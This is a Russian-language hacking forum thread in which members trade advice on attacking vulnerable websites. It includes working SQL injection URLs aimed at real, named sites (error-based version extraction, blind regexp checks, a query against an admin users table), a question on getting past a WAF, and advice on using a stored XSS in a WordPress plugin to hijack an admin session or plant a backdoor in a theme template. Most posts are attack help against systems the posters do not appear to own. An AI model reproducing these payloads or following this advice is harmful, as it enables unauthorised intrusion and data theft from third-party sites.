Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. billybonse

    billybonse Member

    Joined:
    9 Oct 2011
    Messages:
    55
    Likes Received:
    6
    Reputations:
    1
    faza02, это я понял, не могу сформировать запрос чтобы дальше крутить
     
  2. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,662
    Likes Received:
    886
    Reputations:
    363
    вроде там достаточно информации.
    Code:
    http://xxx.com/cat/15?order=1+LIMIT+0+PROCEDURE+ANALYSE+(0,(SELECT+3+ORDER+BY+updatexml(1,concat(0x3A,version()),1)))--+&order_type=DESC
     
    _________________________
  3. billybonse

    billybonse Member

    Joined:
    9 Oct 2011
    Messages:
    55
    Likes Received:
    6
    Reputations:
    1
    Error Number: 1064

    You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'DESC LIMIT 50' at line 5

    SELECT * FROM (`items`) WHERE `category` = '10' AND `sold` = '0' ORDER BY `1` LIMIT 0 PROCEDURE ANALYSE (0, (SELECT 3 ORDER BY updatexml(1, concat(0x3A, version()), `1)))--` DESC LIMIT 50
     
  4. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,662
    Likes Received:
    886
    Reputations:
    363
    знак комментария обязательно должен быть с пробелом в конце. если хотите, чтобы вам помогли, скиньте ссылку
     
    _________________________
  5. YaBtr

    YaBtr Members of Antichat

    Joined:
    30 May 2012
    Messages:
    601
    Likes Received:
    350
    Reputations:
    652
    Не нужно здесь разводить такую переписку. Для этого есть другие средства.
     
  6. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,587
    Likes Received:
    405
    Reputations:
    196
    Есть сайт на VDS, на нем стал появлятся какой-то левый js-код в некоторых js-файлах. PHP-работал от того же юзера, что и на FTP, то есть имел полные права. Я удалил код, поискал шеллы - не нашел ничего, сменил пасс на ftp. Через несколько дней код снова появился. Обшарил все - шеллов не нашел, но были мои шеллы, я подумал что как-то через них может заливается чувак, сменил пассы на них, удалил код, права поменял, теперь php работает как nobody, на js-файлы теперь доступа нет. Через несколько дней снова код появился, я в ахуе. Проверяю логи apache - нет ничего подозрительного, проверяю логи панели vds - тоже ничего подозрительного. И что характерно, права на js-файл сменены на 777, то есть кто-то имеет доступ к аккаунту, что и ftp. Как это возможно? Как найти паразита?
     
  7. 5maks5

    5maks5 Elder - Старейшина

    Joined:
    29 Aug 2010
    Messages:
    465
    Likes Received:
    264
    Reputations:
    40
    Очевидно, троян на вашем компьютере.
    Айболитом не проверяли?
     
  8. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,587
    Likes Received:
    405
    Reputations:
    196
    Троян теоретически возможен. Но windows security essentials молчит, да и в автозагрузке ничего подозрительного.
     
  9. Br@!ns

    Br@!ns Elder - Старейшина

    Joined:
    3 Sep 2010
    Messages:
    915
    Likes Received:
    120
    Reputations:
    25
  10. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,777
    Likes Received:
    848
    Reputations:
    857
    Code:
    http://www.amnh.org/ology/xCards/index.php?cardNumber=047%27+/*!and+(select+1+regexp+if(mid(@@version,1,1)=5,1,%27(%27))*/+--+    TRUE
    
    http://www.amnh.org/ology/xCards/index.php?cardNumber=047%27+/*!and+(select+1+regexp+if(mid(@@version,1,1)=4,1,%27(%27))*/+--+  FALSE
    Извращенский вариант, но имеет право на жизнь

    // YaBtr: Regexp :D
     
    _________________________
    #24070 BigBear, 7 Apr 2015
    Last edited by a moderator: 7 Apr 2015
    Br@!ns and kingbeef like this.
  11. kingbeef

    kingbeef Reservists Of Antichat

    Joined:
    8 Apr 2010
    Messages:
    423
    Likes Received:
    165
    Reputations:
    126
    _________________________
    #24071 kingbeef, 7 Apr 2015
    Last edited: 7 Apr 2015
    winstrool, Br@!ns and yarbabin like this.
  12. Br@!ns

    Br@!ns Elder - Старейшина

    Joined:
    3 Sep 2010
    Messages:
    915
    Likes Received:
    120
    Reputations:
    25
    Code:
    https://www.maesen.com/sexshop/video_web.php?video=(6635)and(1)=1 - TRUE
    http://www.maesen.com/sexshop/ArticulosMini.php?pagina=(45)and(1)=1 - TRUE
    http://www.maesen.com/sexshop/ArticulosMini.php?pagina=(45)and(1)=0 - FALSE
    https://www.maesen.com/sexshop/video_web.php?video=(6635)and(1)=0 - FALSE
    не могу waf обойти, есть варианты?

    PS
    Code:
    http://www.maesen.com/sexshop/video_web.php?video=(88886635)or+1=(SELECT+TOP+1+'id'+FROM+adminusuarios)
    с information_schema.tables вытащить имя колонок с таблицы adminusuarios не получается, при использовании "_" пишет нет такой директори
     
    #24072 Br@!ns, 7 Apr 2015
    Last edited: 7 Apr 2015
  13. larinvlad

    larinvlad New Member

    Joined:
    20 Mar 2014
    Messages:
    26
    Likes Received:
    0
    Reputations:
    0
    Сканировал с помощью акунетикса: /wp-content/plugins/gd-star-rating/ajax.php
    Нашел XSS, написано:
    asr.84391.0.7.1428069437.10.0.30.3.3.0'"()&%<ScRiPt >prompt(973439)</ScRiPt>
    Как его использовать? И даст ли это возможность доступа к бд ?
    Раскручивать sql немного умею, но здесь не знаю куда копать.
     
  14. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,417
    Likes Received:
    814
    Reputations:
    848
    Можете составить запрос который похищает сессию, и в парить его админу или составить запрос который автоматом вписывает бегдор в шаблон темплейта, но естественно это должен сделать авторизованный админ.
     
    _________________________
    larinvlad and YaBtr like this.
  15. kingbeef

    kingbeef Reservists Of Antichat

    Joined:
    8 Apr 2010
    Messages:
    423
    Likes Received:
    165
    Reputations:
    126
    Ты ему не помог, ему нужно раскрутить sql через xss .
     
    _________________________
    Br@!ns and YaBtr like this.
  16. larinvlad

    larinvlad New Member

    Joined:
    20 Mar 2014
    Messages:
    26
    Likes Received:
    0
    Reputations:
    0
    Не могли бы скинуть ссылку на статью где рассматривается выполнение подобных запросов?
     
  17. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,662
    Likes Received:
    886
    Reputations:
    363
    в любой статье по XSS это рассматривается. рядом с этой темой в "важных" есть карта раздела. http://forum.antichat.ru/threads/20140/
     
    _________________________
    larinvlad and Br@!ns like this.
  18. xxl

    xxl New Member

    Joined:
    22 Nov 2012
    Messages:
    24
    Likes Received:
    0
    Reputations:
    0
    Здравствуйте! Нужна помощь. Вот 2 прогона от sqlmap:
    #1 http://rghost.ru/private/6TmxNVXSQ/f4be5442215c6d4f07720fddf568e844
    #2 http://rghost.ru/private/6qgdBCK4S/b05166809cf70ed629397c2789cc97c5
    Что можно выцепить? Я просто с sqlmap 1 раз работаю... Обычно подставил ' и пошло дело... Не пошло - дальше ручками пытаемся... Решил попробовать софтину. Сначала немного был ошарашен количеством тестов (ручками вечность перебирать будешь=)),но результат как-то не очень оказался... (хотя,скорее всего,я что-то не так сделал)
     
  19. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,662
    Likes Received:
    886
    Reputations:
    363
    посмотрели бы видео по теме, полно же в сети. касаемо логов:
    Code:
    all tested parameters appear to be not injectable
    почти последняя строка.
     
    _________________________
  20. xxl

    xxl New Member

    Joined:
    22 Nov 2012
    Messages:
    24
    Likes Received:
    0
    Reputations:
    0
    в том-то и дело,что не нашел.
    possible integer casting detected (e.g. "$userid=intval($_REQUEST['userid'])") at the back-end web application - ?
    Ладно,можно ссылку на подробный мануал(русский только),пожалуйста
    Вот опять: all tested parameters appear to be not injectable
    НО: target URL appears to be UNION injectable with 1 columns
    log: http://rghost.ru/private/6Mt4dGwZD/b50eaa2717166e2b581189961825c0dd
     
    #24080 xxl, 12 Apr 2015
    Last edited: 12 Apr 2015
Loading...
Thread Status:
Not open for further replies.